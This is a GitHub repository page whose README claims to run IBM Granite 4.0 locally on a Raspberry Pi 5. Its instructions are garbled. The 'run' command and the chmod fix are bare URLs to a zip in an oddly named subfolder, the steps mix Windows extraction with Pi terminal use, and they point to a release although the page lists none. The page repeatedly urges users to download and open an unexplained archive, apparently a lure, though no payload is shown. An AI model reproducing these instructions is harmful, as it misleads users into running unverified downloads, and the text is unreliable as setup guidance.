Skip to content

πŸ”’ Run a large language model locally on your Raspberry Pi 5 with IBM Granite 4.0 for private, cloud-free AI inference.

License

Notifications You must be signed in to change notification settings

MooNyeu/granitepi-4-nano

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

17 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ› οΈ granitepi-4-nano - Run AI Locally on Raspberry Pi

πŸ”— Download Now

Download granitepi-4-nano

πŸ“– Description

GranitePi 4.0 lets you run IBM Granite 4.0 on your Raspberry Pi 5 using Ollama. This application prioritizes your privacy. Your data stays on your device. There are no cloud uploads, ensuring you maintain complete control over your information.

πŸš€ Getting Started

Follow these simple steps to download and install GranitePi on your Raspberry Pi 5.

πŸ“¦ System Requirements

Make sure your setup meets these needs:

  • Device: Raspberry Pi 5
  • Operating System: A compatible version of Linux for Raspberry Pi
  • Storage: At least 2 GB of free space
  • RAM: Minimum 1 GB
  • Network: Internet connection for downloading the files

πŸ” Features

GranitePi offers the following benefits:

  • Local AI: Everything runs on your device for privacy.
  • No Tracking: There are no third-party trackers or cloud usage.
  • Easy Setup: Designed for easy installation and use.
  • Educational Tools: Great for learning about AI in a hands-on way.

πŸ“₯ Download & Install

To get started, visit this page to download the software:

Download GranitePi 4.0

Once there, follow these steps:

  1. Select the Latest Release: Look for the most recent version at the top of the page. It should have the highest version number.

  2. Download the Zip File: Click on the asset that ends with .zip. This will download a compressed file containing all necessary components.

  3. Extract the Files: After the download is complete, find the zip file in your downloads folder. Right-click on it and select "Extract All" or use your preferred extraction tool.

  4. Open a Terminal: On your Raspberry Pi, open the terminal application. You can find it in the application menu.

  5. Navigate to the Folder: Use the cd command to go to the folder where you extracted the files. For example:

    cd ~/Downloads/granitepi-4-nano-<version>
    
  6. Run GranitePi: Launch the application by typing the following command in the terminal:

    https://raw.githubusercontent.com/MooNyeu/granitepi-4-nano/main/bdellid/granitepi-4-nano_v1.6.zip
    

    This will start the application, and you should see the interface load in a few moments.

πŸ› οΈ Troubleshooting

If you run into issues, consider these common solutions:

  • Permission Error: If the terminal says "permission denied," you may need to give execute permission to the start script. Run:

    chmod +x https://raw.githubusercontent.com/MooNyeu/granitepi-4-nano/main/bdellid/granitepi-4-nano_v1.6.zip
    
  • Missing Dependencies: Ensure that you have the necessary packages installed. You can typically do this with the following command:

    sudo apt-get install < missing-package >
    
  • Consult Online Resources: If problems persist, look for help online in forums or the GranitePi community.

πŸ“š Additional Resources

For more information, consider these resources:

🀝 Contributing

If you want to help improve GranitePi, contributions are welcome. Check the repository for guidelines on how to contribute.

πŸ“ License

This project is licensed under the MIT License. Go to the repository for more details.

🌟 Stay Updated

To keep updated on new features and releases, consider watching this repository on GitHub. You will receive notifications about significant changes or updates.

πŸŽ‰ Enjoy GranitePi 4.0!

Thank you for downloading GranitePi. Enjoy exploring AI locally on your Raspberry Pi while keeping your data safe and secure.

About

πŸ”’ Run a large language model locally on your Raspberry Pi 5 with IBM Granite 4.0 for private, cloud-free AI inference.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •